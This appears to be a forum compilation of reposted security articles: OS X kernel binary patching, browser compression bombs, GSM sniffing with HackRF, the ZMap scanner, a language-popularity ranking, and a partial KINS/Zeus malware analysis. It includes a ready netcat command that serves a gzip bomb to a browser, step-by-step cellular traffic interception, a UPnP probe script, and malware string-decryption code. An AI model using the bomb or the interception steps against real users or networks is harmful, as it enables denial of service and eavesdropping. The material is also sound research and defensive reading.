The bsd_ast function is the BSD half of the OS X timer interrupt handler. If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the timer state, because setitimer(2) allows both one-shot and periodic timers.

As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal instead to a specific thread. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let's do that.

Patching the Kernel

It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I'd end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly.
That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about.

$ gdb /mach_kernel
(gdb) disas bsd_ast
Dump of assembler code for function bsd_ast:
0xffffff8000568a50 <bsd_ast+0>:   push %rbp
0xffffff8000568a51 <bsd_ast+1>:   mov %rsp,%rbp
...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>
...

I've annotated the assembly with the corresponding C code in italics. The final sequence is odd. It should be a call to psignal but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What's going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn't know its name. The definitions of psignal and psignal_uthread are:

void
psignal(proc_t p, int signum)
{
    psignal_internal(p, NULL, NULL, 0, signum);
}

static void
psignal_uthread(thread_t thread, int signum)
{
    psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum);
}

With the constants expanded, the call we're seeing is psignal_internal(p, 0, 0, 0, 0x1b) and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed where we are in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast's one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared in both sides of the conditional:
...
if (timerisset(&p->p_vtimer_prof.it_value))
0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15)
0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319>
0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15)
0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335>
task_vtimer_set(p->task, TASK_VTIMER_PROF);
0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi
0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi
0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349>
task_vtimer_clear(p->task, TASK_VTIMER_PROF);
0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi
0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi
0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear>
psignal(p, SIGPROF);
0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi
0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi
0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx
0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>
...

We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread (a single nine-byte mov instruction) and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is:

...
0xffffff8000568b7b <bsd_ast+299>: mov 0x18(%r15),%rdi
0xffffff8000568b7f <bsd_ast+303>: mov $0x2,%esi
0xffffff8000568b84 <bsd_ast+308>: cmpq $0x0,0x1e0(%r15)
0xffffff8000568b8c <bsd_ast+316>: jne 0xffffff8000568b98 <bsd_ast+328>
0xffffff8000568b8e <bsd_ast+318>: cmpl $0x0,0x1e8(%r15)
0xffffff8000568b96 <bsd_ast+326>: je 0xffffff8000568b9f <bsd_ast+335>
0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>
0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568ba4 <bsd_ast+340>
0xffffff8000568b9f <bsd_ast+335>: callq 0xffffff8000237660 <task_vtimer_clear>
0xffffff8000568ba4 <bsd_ast+340>: xor %edi,%edi
0xffffff8000568ba6 <bsd_ast+342>: xor %esi,%esi
0xffffff8000568ba8 <bsd_ast+344>: mov %gs:0x8,%rdx
0xffffff8000568bb1 <bsd_ast+353>: mov $0x4,%ecx
0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d
0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>
...

If we hadn't found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we've been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven't changed from version to version, although the compiler and therefore the generated code do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite.
It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We’ll see. Further Reading Binary patching is an old, venerable technique. This is just a simple instance of it. If you liked reading about this, you may also like to read Jeff Arnold’s paper “Ksplice: Automatic Rebootless Kernel Updates.’’ Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system. Sursa: research!rsc: Hacking the OS X Kernel for Fun and Profiles
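A small sanity check worth doing before and after patching (my own sketch, not from the article): back up the kernel, then use the same gdb disassembly as above to confirm that the inlined psignal_internal call setup now loads the current thread and the PSIG_THREAD flag instead of the process pointer:

$ sudo cp /mach_kernel /mach_kernel.orig    # keep an unpatched copy you can restore from
$ gdb /mach_kernel
(gdb) disas bsd_ast
# before the final callq you should now see "mov %gs:0x8,%rdx" and "mov $0x4,%ecx"
# rather than the original "mov %r15,%rdi" / "xor %edx,%edx" / "xor %ecx,%ecx" sequence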
-
Vulnerabilities that just won't die - Compression Bombs

Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices - a subset of the test cases we formed related to compression bombs - specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content given that the vulnerability (or perhaps more accurately, 'common weakness' - CWE-409: Improper Handling of Highly Compressed Data (Data Amplification)) has been reported and well known for over ten years. The results surprised us - in short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including in some cases, full exhaustion of all available disk space with no user input.

Introduction to HTTP Compression

HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemes, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on-the-fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to be rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC1952) is considered the most widely supported compression scheme in use today, although the common weaknesses discussed in this post are applicable to all schemes in use today.

What is a Compression Bomb?

Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data. This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with the multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1. It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression:

$ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c
1+0 records in
1+0 records out
10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s
159

Testing Framework

Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a 'Content-Disposition' header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine-grained control, although content is currently compressed on the fly, limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities.
During our tests, we delivered compressed content in a variety of different forms, both as ‘file downloads’ and in-line ‘HTML content’. The exact tests we conducted and the results can be read in our more detailed paper on this topic here. Is my Browser Vulnerable? It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our test. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip encoded file is returned with a ‘Content-Disposition’ header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview. Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted. Conclusion With the growth of mobile data connectivity, improvements in data compression for Internet communications has become highly desirable from a performance perspective, but extensions to these techniques outside of original protocol specifications can have unconsidered impacts for security. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation User-Agents which handle compression mechanisms differently, has substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited. Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
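For quick local testing without the PHP framework, here is a rough sketch of serving a single-round gzip bomb yourself (GzipBloat is the proper way to do multi-round encoding); the port and file name are assumptions, and the -p flag syntax varies between netcat variants:

$ dd if=/dev/zero bs=10M count=100 | gzip -9 > bomb.gz        # roughly 1 GB of zeros compressed to about 1 MB
$ { printf 'HTTP/1.1 200 OK\r\n';
    printf 'Content-Type: text/html\r\n';
    printf 'Content-Encoding: gzip\r\n';
    printf 'Content-Length: %s\r\n\r\n' "$(wc -c < bomb.gz)";
    cat bomb.gz; } | nc -l -p 8080                            # serves exactly one request to the browser under test, then exits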
-
[h=3]Sniffing GSM with HackRF[/h]
by admin » Wed Aug 14, 2013 1:29 am

I will open by saying: only sniff your own system or a system you have been given permission to work on. Sniffing a public network in your country may be illegal.

I recently had a play with sniffing some GSM using the HackRF. The clock was a little unstable and drifted quite a bit, but in the end I was able to view lots of different system messages etc. I will assume you have a working Linux system with GNU Radio and HackRF running for this tutorial. If not, you can use the live CD which I referenced in the software section of the forum; it's a great tool and the HackRF works right out of the box.

The first thing to do is find out the frequency of a local GSM tower. For this I used gqrx, which is pre-loaded on the live CD. Open it up and have a look around the 900 MHz band and you should see something like the image below.

[attachment: gqerx.png]

You can see the non-hopping channel at 952 MHz and another at 944.2 MHz; write down the approximate frequency for the later step. Now we need to install Airprobe using the following commands:

git clone git://git.gnumonks.org/airprobe.git
cd airprobe/gsmdecode
./bootstrap
./configure
make
cd ../gsm-receiver
./bootstrap
./configure
make

That's all there is to it; we can now start receiving some GSM. First things first, start Wireshark with the following command:

sudo wireshark

Select "lo" as the capture device and enter gsmtap in the filter window like in the image below:

[attachment: wireshark.png]

Now go back to your terminal window and enter the following:

cd airprobe/gsm-receiver/src/python
./gsm_receive_rtl.py -s 2e6

A window will pop up. The first thing to do is uncheck auto gain and set the slider to full, then enter the GSM frequency you noted before as the center frequency. Also select peak hold and average in the top window's trace options like so:

[attachment: spectrum.png]

You will see that only the signal on the right (blue line) consistently stays in place over the peak hold (green line), indicating that it is the non-hopping channel. All we need to do to start decoding is click on the center of that frequency hump in the top window. You may see some errors coming up but that is OK; eventually it will start to capture data, something like this:

[attachment: data.png]

You can now see the GSM data popping up in Wireshark. As I said at the beginning, the HackRF clock does drift, so you will need to keep clicking to re-center the correct frequency, but all in all it works pretty well. As silly as it may sound, wrapping your HackRF in a towel or similar really helps the thermal stability of the clock and reduces drift.

Now this "hack" is obviously not very useful on its own, but I think at least it helps to show the massive amount of potential there is in the HackRF.

Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
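If you prefer the command line to the Wireshark GUI, the same GSMTAP frames that airprobe sends to the loopback interface can be dumped with tshark; GSMTAP conventionally uses UDP port 4729, and older tshark builds take -R instead of -Y for the display filter:

sudo tshark -i lo -f "udp port 4729" -Y gsmtap    # capture filter on the GSMTAP port, display filter on the gsmtap dissector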
-
Scanning the Internet in 45 Minutes by Dennis Fisher

The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain, has always been a challenge for researchers, but a new tool released by a group from the University of Michigan is capable of scanning the entire IPv4 address space in less than an hour.

There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation, and they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new Zmap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open source and freely available for other researchers to use.

To demonstrate the capabilities of Zmap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more than 34 million hosts, or what they estimate to be about 98 percent of the machines in that space.

Zmap is designed specifically to bypass some of the speed obstacles that have slowed down previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner.

“While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “Zmap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.”

That stateless scanning, the researchers said, allowed Zmap to achieve both faster response times and better coverage of the target address space.

As for practical applications of the tool, the researchers have already found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, only 6.9 million of those certificates were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years.
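Coming back to the "random permutation generated by a cyclic multiplicative group" mentioned in the quote, here is a toy Python sketch of the idea - my own illustration, not code from the ZMap paper. For a prime p and a primitive root g, repeatedly multiplying by g modulo p visits every value from 1 to p-1 exactly once, so a scanner can cover the whole address space in a pseudorandom order while remembering only its current position. The toy uses the small prime 257 (3 is a primitive root mod 257) in place of the prime slightly larger than 2^32 that a real 32-bit address space requires.

def cyclic_scan_order(p=257, g=3, space=256):
    """Yield every 'address' 0..space-1 exactly once, in the pseudorandom
    order given by the cyclic multiplicative group mod p
    (p prime, g a primitive root mod p, space <= p - 1)."""
    x = 1
    for _ in range(p - 1):
        x = (x * g) % p          # next group element; no repeats until it wraps
        if x <= space:           # map group elements 1..space onto addresses 0..space-1
            yield x - 1

order = list(cyclic_scan_order())
assert sorted(order) == list(range(256))   # full coverage, no duplicates, no stored state
print(order[:16])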
The Zmap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid 7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet. “Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
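For context on what such a probe looks like on the wire, UPnP discovery is a single SSDP M-SEARCH datagram to UDP port 1900. The Python sketch below is my own illustration of that request - it is not the researchers' probe and it does not exploit anything; it simply sends one M-SEARCH to a host you are authorized to test and prints the reply, whose SERVER header is what typically identifies vulnerable UPnP stacks.

import socket

M_SEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: upnp:rootdevice\r\n"
    "\r\n"
).encode()

def probe_upnp(target, timeout=3.0):
    """Send one SSDP M-SEARCH to UDP/1900 on `target` and return the raw reply."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(M_SEARCH, (target, 1900))
        data, _ = s.recvfrom(4096)
        return data.decode(errors="replace")
    except socket.timeout:
        return None
    finally:
        s.close()

if __name__ == "__main__":
    reply = probe_upnp("192.0.2.10")   # placeholder address - only probe hosts you own
    print(reply or "no SSDP response")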
-
[h=1]Java tops C as most popular language in developer index[/h]
[h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h]
By Paul Krill | InfoWorld

Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March.

"C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th.

Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings.

"Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings."

Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining.

For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java tops (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent).

This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com.

Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
-
KINS malware: initialization and DNA paternity test

A new post about KINS. I don't have anything interesting on my hands right now, so I decided to go on with the analysis of it. That was my first idea, but someone (thanks Michael) suggested something to add to the analysis. The idea comes from a simple question: is KINS a new myth, or was it simply born from the leaked Zeus source code? I'll start looking at KINS with an eye to Zeus, trying to understand whether there are similarities or not. Holidays are coming and I don't have a lot of free time for a complete analysis of the entire malware, so for now you'll have to be satisfied with just the groundwork of KINS and Zeus_leaked_source_code: the initialization part only. It's generally a tedious job, but from the groundwork you can learn a lot about the malware. Anyway, I'll try to write something light and readable.

Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2
Reference Zeus leaked source code: version 2.0.8.9

Encrypted strings

Strings are always a good starting point, and like almost all malware out there, every suspicious string has been encrypted - most of the time a simple xor encryption suffices. KINS doesn't decrypt all the strings at once; it decrypts a single string only when it has to use it. Inside the .text section there's an array of _STRINGINFO structures, and each structure contains the necessary data about a single encrypted string:

00000000 _STRINGINFO struc ; (sizeof=0x8)
00000000 key db ? ; xor key used to decrypt the encoded string
00000001 db ? ; undefined ; unused because xor key is 1 byte only
00000002 size dw ? ; size of the string to decrypt
00000004 encodedString dd ? ; string to decrypt
00000008 _STRINGINFO ends

When the malware needs a string it calls DecryptStringW, passing an index to it; the index is the array index:

4231CA DecryptStringW proc near
4231CA movzx eax, ax ; Id of the string to decrypt
4231CD lea eax, STRINGINFO[eax*8] ; current _STRINGINFO identified by the index
4231D4 xor ecx, ecx
4231D6 xor edx, edx ; iterator index
4231D8 cmp cx, [eax+_STRINGINFO.size]
4231DC jnb short loc_423209
4231DE push ebx
4231DF push edi
4231E0 DecryptStringIterator:
4231E0 mov edi, [eax+_STRINGINFO.encodedString]
4231E3 movzx ebx, [eax+_STRINGINFO.key]
4231E6 movzx ecx, dx
4231E9 movsx di, byte ptr [edi+ecx]
4231EE xor di, bx ; xor with key
4231F1 xor di, dx ; xor with iterator index
4231F4 mov ebx, 0FFh
4231F9 and di, bx ; the result is a unicode string
4231FC inc edx ; increase iterator index
4231FD mov [esi+ecx*2], di ; decrypt byte by byte
423201 cmp dx, [eax+2]
423205 jb short DecryptStringIterator
423207 pop edi
423208 pop ebx
423209 loc_423209:
423209 movzx eax, [eax+_STRINGINFO.size]
42320D xor ecx, ecx
42320F mov [esi+eax*2], cx ; put NULL at the end of the string
423213 retn
423213 DecryptStringW endp

A double xor operation over every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption method (DecryptStringW) used by Zeus_leaked_source_code. It's a perfect copy&paste approach. There are a lot of strings declared inside the exe, so a comparison of the decrypted strings is necessary.
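For readers who want to replay the scheme outside a debugger, the routine is easy to mirror in Python. The snippet below is my own re-implementation of the algorithm shown in the listing (each byte is xored with the one-byte key and with its own index, masked to 8 bits and widened to a Unicode character); the sample string and key are made up purely for illustration.

def decrypt_string(encoded, key):
    """Mirror of DecryptStringW: out[i] = (encoded[i] ^ key ^ i) & 0xFF."""
    return "".join(chr((b ^ key ^ i) & 0xFF) for i, b in enumerate(encoded))

# Hypothetical round-trip with key 0x5A - the xor scheme is its own inverse
plain = "ntdll.dll"
blob = bytes((ord(c) ^ 0x5A ^ i) & 0xFF for i, c in enumerate(plain))
assert decrypt_string(blob, 0x5A) == plain
print(decrypt_string(blob, 0x5A))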
To decrypt all the strings inside KINS you can use this simple IDC function script:

static ListStrings(address){
    auto iString;
    auto sInfo;
    auto xorKey;
    auto sLen;
    auto crypted;
    auto i;

    Message("\nDecrypted string list:\n");
    iString = 0;
    while((address + iString) < 0x4026C8)
    {
        sInfo = address + iString;
        xorKey = Byte(sInfo);
        if (xorKey != 0)
        {
            sLen = Word(sInfo+2);
            crypted = Dword(sInfo+4);
            if (!((crypted < MinEA()) || (crypted > MaxEA())))
            {
                Message("\"");
                for(i=0;i<sLen;i++)
                    Message("%c", Byte(crypted+i) ^ xorKey ^ i);
                Message("\"\n");
                iString = iString + 7; // sizeof(_STRINGINFO) - 1
            }
        }
        iString++;
    }
}

The resulting list contains a lot of interesting strings, but if you compare it with the original list provided by Zeus you will notice a lot of identical strings. I have to admit there are some new entries, but the core remains the same.

Init

KINS initialization resides in a snippet of code starting at 407A25 and ending at 407C73. It performs all the tasks needed for a clean execution of the malware. Looking at the code you'll notice that the Init procedure is referenced from two different places: one at the beginning of the malware and the other one during its execution. Besides, Init contains a lot of calls, but not all of them are executed the first time. That's because KINS has two levels of initialization: it has to set some things up now and some later. The first level is performed at the very beginning of the code, and the second level is executed when a particular operation has to be done. I'll tell you something more about this second level in the next blog post. For example: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first execution of Init. I think KINS doesn't want to spoil too much in the first part of its code, and prefers to follow an exact time scheme. I said KINS, but I should say Zeus, because this particular code structure is the same one used by Zeus.

Moreover, there's another piece of code taken via copy&paste: to decide what to set up the first time and what later, Init checks the dword value passed as a parameter - I call it "flags". flags is checked inside some if statements; here is a practical example:

.text:00407A31 mov eax, [ebp+flags] // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one ...
.text:00407A36 mov esi, eax
.text:00407A38 and esi, 1 // Check for INITF_INJECT_START flag bit
.text:00407A3B mov [esp+420h+flags_Core], esi
.text:00407A3F jnz short loc_407A4B
.text:00407A41 xor ebx, ebx // First time
.text:00407A43 mov processFlags, ebx
.text:00407A49 jmp short loc_407A4D
.text:00407A4B xor ebx, ebx // Second time
.text:00407A4D call InitLoadModules

flags represents the value passed to Init: the first time its value is 0 (INIT_NORMAL_START) and the second time it is 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have only just started the analysis, but the copy&paste method has already been used many times. To put it plainly: KINS is heavily based on Zeus_leaked_source_code. Some parts are exactly equal, some parts have minor changes only, some have interesting additions, and some come from Zeus versions above 2.0.8.9. Yes, the KINS writers took something from more than one Zeus version.

Copy&paste

As far as I've seen, the core of the malware is equal to Zeus's core. It's based on the same structures, variables and code design. Here is a list of things that are taken directly from Zeus.
- Global variables

Global variables are one of the first things I tried to understand, and I have to say that most of them are simple flags used to recognize a particular status or event. You can recognize them in the code by looking at mov instructions:

407C34 mov ref_count, ebx
407C3A mov reportFile, ax
407C40 mov registryKey, ax
407C46 mov readWriteMutex_localconfig, ax
407C4C mov registryKey_localconfig, ax
407C52 mov readWriteMutex_localsetting, ax
407C58 mov registryKey_localsetting, ax

- Memory initialization

The malware will need dynamically allocated memory; you can find the memory initialization code starting at @407A5D. This time you can see a mix of flag/variable init:

407A5D push ebx
407A5E push 80000h
407A63 push ebx
407A64 call ds:HeapCreate
407A6A mov mainHeap, eax
407A6F cmp eax, ebx
407A71 jnz short HeapCreate_OK
407A73 call ds:GetProcessHeap
407A79 mov hHeap, eax
407A7E mov heapCreated, bl ; heapCreated = false;
407A84 jmp short loc_407A8D
407A86 HeapCreate_OK:
407A86 mov heapCreated, 1 ; heapCreated = true;

mainHeap is a global variable and heapCreated is just a flag recording whether the heap creation succeeded or not.

- Crypt initialization

Crypto is used by KINS and, like all the other functionalities, it gets a small place inside Init.

407A9A mov _last_rand_tickcount, ebx ; _last_rand_tickcount = 0;
407AA0 mov crc32Intialized, bl ; crc32Intalized = false;

From the only two lines of code used to perform this init operation it's hard to guess their meaning but, again, a flag and a variable are used. If you want to understand more about them you can try IDA's xref option. After some more investigation you can understand their real use: _last_rand_tickcount is used in a comparison between a value obtained from GetTickCount and the previous tick count value; crc32Initialized is true if crc32 has been initialized, false otherwise.

- Winsock initialization

Another expected feature of the malicious program is the ability to communicate with the server. A malware has to send something to the server, and to start this communication process it needs a call to a function like WSAStartup. The winsock part is entirely contained in a single call instruction to WSAStartup. KINS and Zeus initiate client-server communication in the same classical way.

- initHandles, initUserData, initPaths

The names of the three procedures above are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not that interesting per se. To sum up: KINS creates a manual reset event, gets the security information of a logon access (it saves two values: the length of the logon security identifier (SID) and an Id which is calculated as crc32(SID)), and gets the full path of the KINS executable.

- initOsBasic

